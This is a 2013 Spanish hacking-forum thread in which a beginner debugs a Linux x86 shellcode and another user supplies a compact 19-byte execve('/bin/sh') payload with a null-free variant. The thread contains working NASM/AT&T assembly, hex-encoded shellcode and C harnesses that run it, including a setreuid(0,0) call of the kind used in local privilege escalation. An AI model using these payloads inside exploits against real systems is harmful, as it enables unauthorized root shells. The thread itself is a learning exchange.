elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Duda con Shellcode
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda con Shellcode  (Leído 7,806 veces)
10537

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Duda con Shellcode
« en: 3 Marzo 2013, 19:45 pm »

Hola, ¿Cómo están?

Bueno como pueden ver soy nuevo en el foro, y quería saber si alguien me puede ayudar con una shellcode que estoy haciendo para mi propio conocimiento, he leído ya los manuales de ASM y de Shellcodes, obviamente hay shellcodes de ejemplo que ya he hecho, pero estoy intentando hacer una por cuenta propia para saber si en verdad he entendido los manuales, pero me ha ocurrido un problema, hago mi código en ensamblador, lo compilo y todo bien, lo enlazo, me voy al objdump saco el shellcode, y lo coloco en mi programa en C, pero cuando lo ejecuto me dice:


Shellcode Length: 37
Violación de segmento (`core' generado)


colocare aquí mi código en NASM, creo que el error esta allí, y creo que tiene algo que ver con las direcciones a las cuales estoy enviando los registros, pero de verdad tengo muchas dudas, si alguien me puede ayudar se lo agradecería mucho.


section .data
   shell: db "/bin/shNAAAABBBB"
section .bss

section .text

global _start:

_start:
   push ebp        ;Creo mi stack
   mov ebp, esp
   
   mov eax, eax   
   mov al, 70      ;Llamada a la interrucion 70 setreuid
   xor ebx, ebx    ;lo vuelvo null
   xor ecx, ecx    ;lo vuelvo null
   int 80h         ;llamada al Kernel
   
   xor eax, eax    ;lo vuelvo null
   mov ebx, shell  ;envio a ebx el valor de shell '/bin/shNAAAABBBB'
   mov [ebx+7], al ;sustituyo a la N con el caracter de terminacion \0
   mov [ebx+8], ebx ;sustituyo a la AAAA con Null
   mov [ebx+12], eax ;sustituyo a la BBBB con Null
   mov al, 11        ;Llamada a la interrucion 11 execve
   int 80h           ;llamada al Kernel

   mov esp, ebp      ;destruyo el stack
   pop ebp
   ret



Esto es Shellcoding para Linux no para Windows pero se que cualquiera se daría cuenta al ver el código NASM, ahora coloco mi codigo en C con la Shellcode:


#include<stdio.h>
#include<string.h>

unsigned char code[] = "\x55\x89\xe5\x89\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xbb\xa8\x90\x04\x08\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\xcd\x80\x89\xec\x5d\xc3";


main(){
   printf("Shellcode Length: %d\n", strlen(code));
   int (*ret)() = (int(*)())code;
   ret();
}


Compilo mi código en C y lo ejecuto, y me da el error que le dije al principio:


Shellcode Length: 37
Violación de segmento (`core' generado)


Espero alguien me pueda guiar de verdad les agradecería no postear código ya que sentiría como si me hicieran un spoiler xD, si me pueden guiar y explicar sería mejor para mi, muchas gracias a todos.
En línea

xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Duda con Shellcode
« Respuesta #1 en: 5 Marzo 2013, 02:35 am »

Hola

Olvidandome de setreuid, Carga eax en el stack y copia la dirección del mismo a ecx.

Un saludo.

P.D: Ese código esta mal optimizado 37 bytes pfff... yo 19 bytes.
En línea

10537

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Duda con Shellcode
« Respuesta #2 en: 5 Marzo 2013, 03:39 am »

¡Gracias por la respuesta  ;D, voy a hacer el cambio que me comentas y luego lo publicare para que le heches un ojo, con respecto a la optimización pues la verdad no esta nada optimizada jajaja es que soy nuevo en las shellcodes y estoy intentando poner en práctica lo aprendido, muchas gracias por tu respuesta, probare y veré que tal =) , gracias!!!
En línea

10537

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Duda con Shellcode
« Respuesta #3 en: 9 Marzo 2013, 19:41 pm »

Bueno he hecho lo que me dijiste en el post anterior, pero me sigue generando la violación del segmento.

Este mi codigo en C.
Código:
#include<stdio.h>
#include<string.h>

unsigned char code[] = "\x55\x89\xe5\x89\xc0\xb0\x46\x31"\
"\xdb\x31\xc9\xcd\x80\x31\xc0\x89\xc4\x8d"\
"\x08\xbb\xac\x90\x04\x08\x88\x43\x07\x89"\
"\x5b\x08\x89\x43\x0c\xb0\x0b\xcd\x80\x89"\
"\xec\x5d\xc3";


main(){
   printf("Shellcode Length: %d\n", strlen(code));
   int (*ret)() = (int(*)())code;
   ret();
}


Este es mi código en ASM:

Código:
section .data
   shell: db "/bin/shNAAAABBBB"
section .bss

section .text

global _start:

_start:
   push ebp        ;Creo mi stack
   mov ebp, esp
   
   mov eax, eax   
   mov al, 70      ;Llamada a la interrucion 70 setreuid
   xor ebx, ebx    ;lo vuelvo null
   xor ecx, ecx    ;lo vuelvo null
   int 80h         ;llamada al Kernel
   
   xor eax, eax    ;lo vuelvo null
   mov esp, eax
   lea ecx, [eax]
   mov ebx, shell  ;envio a ebx el valor de shell '/bin/shNAAAABBBB'
   mov [ebx+7], al ;sustituyo a la N con el caracter de terminacion \0
   mov [ebx+8], ebx ;sustituyo a la AAAA con Null
   mov [ebx+12], eax ;sustituyo a la BBBB con Null
   mov al, 11        ;Llamada a la interrucion 11 execve
   int 80h           ;llamada al Kernel

   mov esp, ebp      ;destruyo el stack
   pop ebp
   ret

Creo que mi código en ASM esta mal de pies a cabeza, y la segunda opción sería que no entendí las recomendaciones de CPU2, de tanto y tanto cabecear seguí otro tutorial, e hice este ejemplo el cual funciona correctamente:

Código NASM:

Código:
section .text

global _start


_start:
        xor eax, eax
        mov al, 70           
        xor ebx, ebx
        xor ecx, ecx
        int 80h

        jmp short ender

        starter:

        pop ebx                 
        xor eax, eax
        mov [ebx+7 ], al       
        mov [ebx+8 ], ebx     
        mov [ebx+12], eax     
        mov al, 11             
        lea ecx, [ebx+8]       
        lea edx, [ebx+12]       
        int 80h               

        ender:
        call starter
        db '/bin/shNAAAABBBB'

Codigo en C:

Código:
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
      "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\
      "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\
      "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\
      "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";

main(){
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Creo que me falta leer mucho más, y pelear también mucho mas con el ASM para poder realizar una Shellcode optimizada y desde cero, si alguien me recomienda algunos tutoriales se los agradecería mucho, bueno la verdad estoy contento porque, poco a poco estoy logrando comprender las Shellcodes.[/size]
En línea

xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Duda con Shellcode
« Respuesta #4 en: 9 Marzo 2013, 21:32 pm »

Creo que mi código en ASM esta mal de pies a cabeza, y la segunda opción sería que no entendí las recomendaciones de CPU2

Exacto, me refería a esto:

Código
  1. pushl %eax
  2. movl %esp, %ecx

Tú código:

Código
  1. mov esp, eax
  2. lea ecx, [eax]

1: No estas cargando eax en el stack, estas copiando su contenido a esp, estas destruyendo la dirección de esp.
2: Estas copiando el contenido de eax a ecx, el segundo parametro de execve requiere un puntero.

Creo que me falta leer mucho más, y pelear también mucho mas con el ASM para poder realizar una Shellcode optimizada y desde cero, si alguien me recomienda algunos tutoriales se los agradecería mucho, bueno la verdad estoy contento porque, poco a poco estoy logrando comprender las Shellcodes.

Puedo hacer eso del "spoiler", tendrás una SC optimizada y si quieres te ayudo a entenderla.

Un saludo.
« Última modificación: 10 Marzo 2013, 02:57 am por cpu2 » En línea

10537

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Duda con Shellcode
« Respuesta #5 en: 12 Marzo 2013, 14:54 pm »

Citar
Puedo hacer eso del "spoiler", tendrás una SC optimizada y si quieres te ayudo a entenderla.


Hola de nuevo, bueno si lo mejor será hacer lo del "spoiler", me estoy viendo un vídeo en youtube de securitytube donde explican la Shellcode stack method, y tienes razón cpu2 entendí mal tu recomendación y estaba haciendo todo mal, si puedes hacer lo del "spoiler" ya que me quieres ayudar a entender las Shellcodes, de verdad estoy muy agradecido contigo, esperare tu post, Saludos!!!
En línea

xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Duda con Shellcode
« Respuesta #6 en: 12 Marzo 2013, 19:28 pm »

Esta sería la de 19 bytes.

Código
  1. .section .text
  2. .globl _start
  3.  
  4. _start:
  5.  
  6. push $0x68732f6e
  7. push $0x69622f2f
  8. mov %esp, %ebx
  9. push %eax
  10. mov %esp, %ecx
  11. add $0x0b, %al
  12. int $0x80

La línea 6 y 7: Cargan la dirección en el stack, si traduces los valores en hex veras que es //bin/sh.

Línea 8: Copia la dirección al primer argumento ebx, la dirección que mueves apunta a //bi, al segundo push, lee todo hasta que se "tope" con un cero que como tendrías que saber significa fin de la cadena.

Línea 9: Al valer eax cero, carga un NULL en el stack.

La 10 como la 8, pero ojo el segundo argumento no es como el primero hace otra cosa, pero no viene al caso, si quieres lo explico.

Las restantes no creo que hagan falta explicarlas.

Esas dos barras absolutas no me gustan, aunque pese más para mí esta mejor este.

Código
  1. .section .text
  2. .globl _start
  3.  
  4. _start:
  5.  
  6. push $0xff978cd0
  7. notl (%esp)
  8. push $0x6e69622f
  9. mov %esp, %ebx
  10. push %eax
  11. mov %esp, %ecx
  12. add $0x0b, %al
  13. int $0x80

Cargas /sh0 pero en negativo, ese not de la línea 7 vuelve positiva la dirección ala que esta apuntando esp, en este caso el primer push y lo deja /sh0, este metodo se utiliza para no dejar bytes núlos.

Código
  1. push $0x68732f ; 68 2f 73 68 00

Un saludo.
« Última modificación: 12 Marzo 2013, 19:31 pm por cpu2 » En línea

10537

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Duda con Shellcode
« Respuesta #7 en: 15 Marzo 2013, 01:05 am »

Hola, ¿Qué tal?, gracias por todo CPU2, ya estoy entendiéndolo mejor =), por cierto me dejaste con la curiosidad de la linea 10.

Código:
mov %esp, %ecx

Citar
La 10 como la 8, pero ojo el segundo argumento no es como el primero hace otra cosa, pero no viene al caso, si quieres lo explico.

También tengo una duda en el segundo fuente de porque agregas a al la dirección 0x0b, la pregunta sería, ¿Porqué se debe hacer así?

Código:
add $0x0b, %al

Muchas gracias por tu ayuda, de verdad!!!
En línea

xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Duda con Shellcode
« Respuesta #8 en: 15 Marzo 2013, 05:03 am »

por cierto me dejaste con la curiosidad de la linea 10.

El segundo argumento, te permite construir una cadena y esa misma sera el nombre del proceso.

También tengo una duda en el segundo fuente de porque agregas a al la dirección 0x0b

Código:
add $0x0b, %al

Estoy sumando 11 al registro al, pero esta en hexadecimal.

¿Porqué se debe hacer así?

Puedes hacerlo como quieras, es lo bueno de ASM.

Código
  1. or $0x0b, %al
  2.  
  3. xor $0x0b, %al      
  4.  
  5. sub $0xc, %al  
  6. notb %al
  7.  
  8. push $0x0b
  9. pop %rax
  10.  
  11. mov $0x0b, %al
  12.  
  13. add $0x0b, %al

Son más eficientes el mov y el add.
Los tres primeros solo funcionan si al vale cero, son ejemplos no hagas cosas así.

Un saludo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
.:. Shellcode 2 ASM .:. « 1 2 »
ASM
Garfield07 13 10,272 Último mensaje 3 Enero 2011, 20:31 pm
por Garfield07
Duda con tamaño de una shellcode
Bugs y Exploits
.:UND3R:. 9 4,591 Último mensaje 7 Julio 2013, 17:07 pm
por xv0
[Duda] Explotando BoF - No conseguimos ejecutar la shellcode
Hacking
GoKGz 0 1,839 Último mensaje 11 Diciembre 2016, 00:06 am
por GoKGz
[MSF] Modificar un shellcode
Análisis y Diseño de Malware
4v1dy4 8 7,516 Último mensaje 15 Enero 2023, 00:28 am
por 4v1dy4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines